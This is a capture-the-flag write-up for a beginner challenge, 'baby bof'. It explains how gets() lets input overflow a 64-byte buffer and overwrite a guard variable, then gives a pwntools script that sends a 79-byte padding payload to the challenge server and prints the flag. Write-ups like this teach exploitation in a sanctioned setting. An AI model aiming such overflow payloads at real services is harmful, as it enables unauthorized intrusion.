baby bof

nc tcp.espark.tn 6060

Author: 4n7h4r4x

Files

• main.c

Description: Basic buffer overflow to change a guard variable.

Solution: The vulnerable code uses gets() to read into a 64-byte buffer with a char variable x after it. We need to overflow to change x from '\0' to anything else.

Due to stack alignment, the actual offset is 79 bytes:

from pwn import *

host = "tcp.espark.tn"
port = 6060

conn = remote(host, port)
conn.recvuntil(b"?\n")

payload = b"A" * 79 + b"B"
conn.sendline(payload)

response = conn.recvall(timeout=2).decode()
print(response) # Flag: Spark{g3ts_1s_d4ng3r0us_xd}